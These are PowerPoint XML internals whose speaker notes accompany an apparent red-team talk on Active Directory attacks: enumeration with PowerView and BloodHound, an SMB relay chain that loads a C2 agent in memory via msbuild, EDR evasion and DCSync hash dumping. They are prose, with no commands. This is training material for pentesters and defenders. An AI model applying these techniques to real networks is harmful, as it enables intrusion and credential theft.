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dia/image1.jpeg" ContentType="image/jpeg"/>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media/image2.jpeg" ContentType="image/jpeg"/>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media/image3.jpeg" ContentType="image/jpeg"/>
  <Override PartName="/ppt/notesSlides/notesSlide20.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml"/>
  <Override PartName="/ppt/media/image4.jpeg" ContentType="image/jpeg"/>
  <Override PartName="/ppt/notesSlides/notesSlide21.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml"/>
  <Override PartName="/ppt/media/image5.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1pPr>
    <a:lvl2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2pPr>
    <a:lvl3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3pPr>
    <a:lvl4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4pPr>
    <a:lvl5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5pPr>
    <a:lvl6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6pPr>
    <a:lvl7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7pPr>
    <a:lvl8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8pPr>
    <a:lvl9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venir Next Medium"/>
          <a:ea typeface="Avenir Next Medium"/>
          <a:cs typeface="Avenir Next Medium"/>
        </a:font>
        <a:schemeClr val="accent1"/>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chemeClr val="accent1">
              <a:hueOff val="178262"/>
              <a:satOff val="-8651"/>
              <a:lumOff val="-7254"/>
              <a:alpha val="29000"/>
            </a:scheme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Row>
  </a:tblStyle>
  <a:tblStyle styleId="{C7B018BB-80A7-4F77-B60F-C8B233D01FF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chemeClr val="accent6">
              <a:alpha val="25000"/>
            </a:schemeClr>
          </a:solidFill>
        </a:fill>
      </a:tcStyle>
    </a:band2H>
    <a:firstCol>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A01D73"/>
          </a:solid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firstRow>
  </a:tblStyle>
  <a:tblStyle styleId="{EEE7283C-3CF3-47DC-8721-378D4A62B22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chemeClr val="accent5">
              <a:hueOff val="-239254"/>
              <a:lumOff val="-1399"/>
            </a:schemeClr>
          </a:solidFill>
        </a:fill>
      </a:tcStyle>
    </a:firstRow>
  </a:tblStyle>
  <a:tblStyle styleId="{CF821DB8-F4EB-4A41-A1BA-3FCAFE7338EE}"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4EB9B">
              <a:alpha val="26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88900" cap="flat">
              <a:solidFill>
                <a:srgbClr val="5F6568"/>
              </a:solidFill>
              <a:prstDash val="solid"/>
              <a:miter lim="400000"/>
            </a:ln>
          </a:top>
          <a:bottom>
            <a:ln w="12700" cap="flat">
              <a:noFill/>
              <a:miter lim="400000"/>
            </a:ln>
          </a:bottom>
          <a:insideH>
            <a:ln w="25400" cap="flat">
              <a:solidFill>
                <a:srgbClr val="D4EB9B">
                  <a:alpha val="26000"/>
                </a:srgbClr>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D4EB9B">
                  <a:alpha val="26000"/>
                </a:srgbClr>
              </a:solidFill>
              <a:prstDash val="solid"/>
              <a:miter lim="400000"/>
            </a:ln>
          </a:insideH>
          <a:insideV>
            <a:ln w="12700" cap="flat">
              <a:noFill/>
              <a:miter lim="400000"/>
            </a:ln>
          </a:insideV>
        </a:tcBdr>
        <a:fill>
          <a:solidFill>
            <a:srgbClr val="147882"/>
          </a:solidFill>
        </a:fill>
      </a:tcStyle>
    </a:firstRow>
  </a:tblStyle>
  <a:tblStyle styleId="{33BA23B1-9221-436E-865A-0063620EA4FD}" styleName="">
    <a:tblBg/>
    <a:wholeTbl>
      <a:tcTxStyle b="off" i="off">
        <a:font>
          <a:latin typeface="Avenir Next Medium"/>
          <a:ea typeface="Avenir Next Medium"/>
          <a:cs typeface="Avenir Next Medium"/>
        </a:font>
        <a:srgbClr val="FFFFFF"/>
      </a:tcTxStyle>
      <a:tcStyle>
        <a:tcBdr>
          <a:left>
            <a:ln w="12700" cap="flat">
              <a:noFill/>
              <a:miter lim="400000"/>
            </a:ln>
          </a:left>
          <a:right>
            <a:ln w="12700" cap="flat">
              <a:noFill/>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alpha val="75000"/>
            </a:srgbClr>
          </a:solidFill>
        </a:fill>
      </a:tcStyle>
    </a:wholeTbl>
    <a:band2H>
      <a:tcTxStyle b="def" i="def"/>
      <a:tcStyle>
        <a:tcBdr/>
        <a:fill>
          <a:solidFill>
            <a:srgbClr val="686A6A">
              <a:alpha val="85000"/>
            </a:srgbClr>
          </a:solidFill>
        </a:fill>
      </a:tcStyle>
    </a:band2H>
    <a:firstCol>
      <a:tcTxStyle b="on" i="off">
        <a:font>
          <a:latin typeface="Avenir Next Demi Bold"/>
          <a:ea typeface="Avenir Next Demi Bold"/>
          <a:cs typeface="Avenir Next Demi Bold"/>
        </a:font>
        <a:srgbClr val="222222"/>
      </a:tcTxStyle>
      <a:tcStyle>
        <a:tcBdr>
          <a:left>
            <a:ln w="12700" cap="flat">
              <a:noFill/>
              <a:miter lim="400000"/>
            </a:ln>
          </a:left>
          <a:right>
            <a:ln w="63500" cap="flat">
              <a:solidFill>
                <a:srgbClr val="222222"/>
              </a:solidFill>
              <a:prstDash val="solid"/>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686A6A">
              <a:alpha val="85000"/>
            </a:srgbClr>
          </a:solidFill>
        </a:fill>
      </a:tcStyle>
    </a:firstCol>
    <a:la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63500" cap="flat">
              <a:solidFill>
                <a:srgbClr val="222222"/>
              </a:solidFill>
              <a:prstDash val="solid"/>
              <a:miter lim="400000"/>
            </a:ln>
          </a:top>
          <a:bottom>
            <a:ln w="12700" cap="flat">
              <a:noFill/>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12700" cap="flat">
              <a:noFill/>
              <a:miter lim="400000"/>
            </a:ln>
          </a:top>
          <a:bottom>
            <a:ln w="635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firstRow>
  </a:tblStyle>
  <a:tblStyle styleId="{2708684C-4D16-4618-839F-0558EEFCDFE6}" styleName="">
    <a:tblBg/>
    <a:wholeTbl>
      <a:tcTxStyle b="off" i="off">
        <a:font>
          <a:latin typeface="Avenir Next Medium"/>
          <a:ea typeface="Avenir Next Medium"/>
          <a:cs typeface="Avenir Next Medium"/>
        </a:font>
        <a:srgbClr val="838787"/>
      </a:tcTxStyle>
      <a:tcStyle>
        <a:tcBdr>
          <a:left>
            <a:ln w="25400" cap="flat">
              <a:solidFill>
                <a:srgbClr val="5F6568"/>
              </a:solidFill>
              <a:prstDash val="solid"/>
              <a:miter lim="400000"/>
            </a:ln>
          </a:left>
          <a:right>
            <a:ln w="254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635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25400" cap="flat">
              <a:solidFill>
                <a:srgbClr val="5F6568"/>
              </a:solidFill>
              <a:prstDash val="solid"/>
              <a:miter lim="400000"/>
            </a:ln>
          </a:left>
          <a:right>
            <a:ln w="25400" cap="flat">
              <a:solidFill>
                <a:srgbClr val="5F6568"/>
              </a:solidFill>
              <a:prstDash val="solid"/>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3" name="Shape 163"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1143000" y="685800"/>
            <a:ext cx="4572000" cy="3429000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="164" name="Shape 16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 Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://live.sysinternals.com" TargetMode="External"/></Relationships>

</file>

<file path=ppt/notesSlides/_rels/notesSlide11.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4.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15.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16.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17.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18.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19.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20.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21.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Shape 174"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="175" name="Shape 175"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>First we are going to quickly go over Active Directory basics</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Then we are going to talk about enumeration.  We are going to spend a lot of time on enumeration because it is so important. The most common attack path a red team member will follow to domain admin is not the one that contains throwing 0-days around.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>The two main things we are going to focus on in the enumeration phase are UH and we are going to look at some ways to gather hashes from a non domain joined system.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Mention that this talk is starting with the assumption that an initial breach has already occurred </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>We are going to talk about Pass the Hash, why it still works, and what to do when you get into a network where it is possible (spoiler alert, you get to go home early)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Finally we are going to look at some attacks that will work in a post PTH world.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6" name="Shape 226"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="227" name="Shape 227"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Powerview is everything that is good in the world. If you can get it past endpoint detection, which you can with the C2 frameworks we just talked about, it makes AD enumeration a cakewalk. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Respoder is something every pentester should have in their tool bag, and now it has an RDP server</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr/>
          </a:p>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Impact will be used for relaying hashes</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Crackmap will also be used for relaying among other things. It was also written by by3tbl33der. He calls it the Swiss army knife for pen testing, and I tend to agree</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr/>
          </a:p>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Sys internals - What is a hacker? A rouge sysadmin. Sys internals is not going flag EDR, and a lot of times it is already there for you…and if it isn’t you do not even have to drop it on disk, as all sys internal tools can be run from </a:t>
            </a:r>
            <a:r>
              <a:rPr u="sng">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId3" invalidUrl="" action="" tgtFrame="" tooltip="" history="1" highlightClick="0" endSnd="0"/>
              </a:rPr>
              <a:t>live.sysinternals.com</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1" name="Shape 231"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="232" name="Shape 232"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>This shit is crazy.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2" name="Shape 242"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="243" name="Shape 243"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>We can do DNS lookups using LDAP. We don’t have to ask DNS, which has detailed logging and information about what users are querying for are stored. We can just look at AD. For example we could ask for a list of specific computers or all the DCs and the associated IP addresses through just an LDAP call We can also do reverse lookups “what’s the site” or “what’s this computer” related to this IP address? Even if there are not any pointer records configured in DNS, the lookups will be successful because all are through AD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8" name="Shape 248"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="249" name="Shape 249"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Way back in my day we had to do portscanning with ancient technologies like nmap. Since a service using kerberos authentication must register an SPN, an anyone can query ldap, we can get this kind of information by asking the AD DC . We will be provided with a list of all the servers, their port number, the service accounts associated with them and some additional information</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5" name="Shape 255"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="256" name="Shape 256"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Way back in my day we had to do portscanning with ancient technologies like nmap. Since a service using kerberos authentication must register an SPN, an anyone can query ldap, we can get this kind of information by asking the AD DC . We will be provided with a list of all the servers, their port number, the service accounts associated with them and some additional information</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3" name="Shape 263"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="264" name="Shape 264"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>User Hunting is the act of figuring out who is logged in where, who can log in where, ect. Paying especially close attention to elevated and interesting accounts. Powerview is the goto for this. If for some reason you cannot get PowerView in the target enviorment, you can still get all the information with normal powershell commands. When using power view, I encourage you to use the -Stealth option. The stealth option only targets high volume systems such as file servers and DC’s. Less complete information is the price of stealthiness, but this option is great to have in the toolbox.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0" name="Shape 270"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="271" name="Shape 271"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>SMB Relay attacks are easy to pull off, devastating if the right conditions are present..they usually are, and easily fixable. We are going to look at this attack all the way through.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5" name="Shape 275"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="276" name="Shape 276"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>SMB Relay attacks are easy to pull off, devastating if the right conditions are present..they usually are, and easily fixable. We are going to look at this attack all the way through.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0" name="Shape 280"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="281" name="Shape 281"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>The tools we will use are CME to get a list of vulnerable targets, MITM6 which takes advantage of windows preference of ipv6, SILENTYTRINITY for our C2, and ntlmrelay from impacket to relay our hashes. Take a look at the command that we are running there. What is going on here is that ST generates an xml document with some c# embedded. We call msbuild after authenticating with our relayed hash, it will run the xml from the SMB share we control, and compile and execute the ST agent completely in memory with no disk fingerprint.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5" name="Shape 285"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="286" name="Shape 286"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Bloodhound is one of the most useful tools I have ever used. Has tips for exploitation along the edges, It is literally a treasure map!!.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Shape 179"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="180" name="Shape 180"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Here are a list of people that I blatantly stole from for this presentation. These guys, along with Sean metcaff and many others, are doing great research in AD security. They collectively developed most of the tools that us skids  going look at.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1" name="Shape 291"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="292" name="Shape 292"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Example from some labs. This shows the shortest path to Domain admin, but it can be queried to show anything can be graphed, only limited by your imagination. Built in quarries are outstanding though. What this is showing, is that if you compromise any node on this graph, then you have compromised DA. There is even a CS module, and hopefully soon an ST module, that will automate a bloodhound attack path. In this particular one you have a user, that has WriteOwner prigs over another user, so they could for example change their password, who is a member of the SecEngineers group, which has WriteOwner privileges over the Cyber_adm user who has GenericAll writes over the whole domain, including admins. Think about the implications here. You are in an environment with 2k users, countless systems, groups, ect. You compromise a couple of low privilege accounts and get ready to start moving laterally. Which bloodhound, you can target where you need to be to get on a path to domain admin. It also shows open sessions, ACL, GPOs. It is a must use for attackers and defenders. It also looks super pretty on reports.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8" name="Shape 298"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="299" name="Shape 299"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>DCSync is a mimikatz feature that enables us to act as a Domain Controller and request password data from the targeted DC. This means that if we have elevated to DA level access on a non DA computer, we can dump the domain hashes without ever having to logon to the DC. We can also imitate a DC Sync with a non admin user if the proper privileges are enabled, or if we have the ability to enable them.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Shape 184"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="185" name="Shape 185"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>So this is pretty much what I am about to feel like.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Shape 189"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="190" name="Shape 190"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Active Directory, or AD, is a Windows-based directory service. It allows for centralized management of authentication and authorization  A word of caution with SSO, the credentials are only as strong as the weakest link. For example, if there is a weak internal site that authenticates a user using his AD credentials, an attacker could potentially compromise that site and retrieve AD credentials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Shape 194"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="195" name="Shape 195"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>A quick word about LDAP, or lightweight directory Access Protocol. It is a tcp/ip protocol for communicating with Directory Services…. All that is important for us today is that it is the main way you communicate with AD</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Shape 199"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="200" name="Shape 200"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>NTLM, Which stands for Windows NT LAN Manager is a windows authentication protocol that uses NTLM hashes to authenticate to services. It was replaced with Kerberos starting with windows 2k, seriously, but is still used pretty much everywhere. Even in environments where Kerberos is mainly used, there will be some legacy services that still uses NTLM…and later we are going to talk about how to take advantage of that situation.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9" name="Shape 209"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="210" name="Shape 210"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Some kerberos terminology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6" name="Shape 216"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
